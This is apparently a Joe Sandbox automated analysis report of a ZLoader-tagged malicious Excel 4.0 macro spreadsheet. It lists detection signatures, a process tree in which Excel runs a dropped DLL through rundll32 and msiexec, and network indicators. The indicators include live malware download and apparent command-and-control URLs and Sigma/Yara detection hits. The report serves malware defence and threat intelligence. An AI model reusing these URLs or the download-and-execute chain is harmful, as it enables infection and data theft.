Loading ...

Play interactive tourEdit tour

Analysis Report case (1057).xls

Overview

General Information

Sample Name:case (1057).xls
Analysis ID:344667
MD5:cbc37bc9a7ec9836c033708d090db81c
SHA1:a1fbde54662fb5cdb677f5841a3603df30345108
SHA256:95e0295b15b7c624febe347f44747dada5cb1fc79b73561b3153af81b351a8de
Tags:xlsZLoader

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to inject code into remote processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found malicious URLs in unpacked macro 4.0 sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the product ID of Windows
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2056 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 552 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 1776 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • msiexec.exe (PID: 2740 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
case (1057).xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2056, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 552

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: 4.2.rundll32.exe.440000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
    Source: 5.2.msiexec.exe.d0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.44.135:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49169 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49170 version: TLS 1.2
    Binary contains paths to debug symbolsShow sources
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2174110786.0000000002AF0000.00000004.00000001.sdmp, doa.dll.5.dr

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: scfrd[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 00000000h
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 00000000h
    Source: global trafficDNS query: name: rnollg.com
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.150.228:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.150.228:443

    Networking:

    barindex
    Found malicious URLs in unpacked macro 4.0 sheetShow sources
    Source: before.1.0.0.sheet.csv_unpackMacro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D1AF0 InternetReadFile,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: rnollg.com
    Source: msiexec.exe, 00000005.00000003.2180098839.0000000000606000.00000004.00000001.sdmpString found in binary or memory: Https://homesoapmolds.com/post.php
    Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/C
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Cl
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
    Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digice
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
    Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
    Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicer
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: msiexec.exe, 00000005.00000002.2363950897.0000000000970000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: 0DEE0000.0.drString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
    Source: case (1057).xlsString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
    Source: msiexec.exe, 00000005.00000002.2363950897.0000000000970000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/
    Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.php
    Source: msiexec.exe, 00000005.00000002.2364998565.0000000002DD0000.00000004.00000001.sdmpString found in binary or memory: https://govemedico.tk/
    Source: msiexec.exe, 00000005.00000002.2364998565.0000000002DD0000.00000004.00000001.sdmpString found in binary or memory: https://govemedico.tk/_u
    Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://govemedico.tk/post.php
    Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://govemedico.tk/post.php.u
    Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://govemedico.tk/post.phpc
    Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://homesoapmolds.com/
    Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://homesoapmolds.com/?p
    Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://homesoapmolds.com/post.php
    Source: msiexec.exe, 00000005.00000003.2180098839.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.clou
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
    Source: before.1.0.0.sheet.csv_unpackString found in binary or memory: https://rnollg.com/kev/scfrd.dll
    Source: case (1057).xls, 0DEE0000.0.drString found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/C
    Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.44.135:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49169 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49170 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: case (1057).xlsInitial sample: URLDownloadToFileA
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X J5 - "- jR V \ A B C D E F G H I K L M N O P Q R S T 1 ' Cjdigicert' 3 ,
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: case (1057).xlsInitial sample: CALL
    Source: case (1057).xlsInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: case (1057).xlsInitial sample: Sheet size: 503434
    Found obfuscated Excel 4.0 MacroShow sources
    Source: case (1057).xlsInitial sample: High usage of CHAR() function: 147
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00449C60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00449A60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0045DA70
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00443A30
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00455BF0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0050D806
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0050F8FD
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0050D2C4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0050BB6E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0050DD48
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D9C60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D3A30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D9A60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000EDA70
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E5BF0
    Source: Joe Sandbox ViewDropped File: C:\ProgramData\formnet.dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: doa.dll.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal100.expl.evad.winXLS@7/12@4/4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E9C90 AdjustTokenPrivileges,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\0DEE0000Jump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDDB1.tmpJump to behavior
    Source: case (1057).xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2174110786.0000000002AF0000.00000004.00000001.sdmp, doa.dll.5.dr
    Source: case (1057).xlsInitial sample: OLE summary lastprinted = 2021-01-26 16:17:13
    Source: case (1057).xlsInitial sample: OLE indicators vbamacros = False
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0044D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0046D1F2 push dword ptr [ecx]; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0046E9FA push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0046EA51 push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00469A5D push ebp; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004682EB push eax; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_005093ED push ecx; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0046B56F push esp; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0046B700 push ss; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00522B73 push esi; ret
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Yzub\doa.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
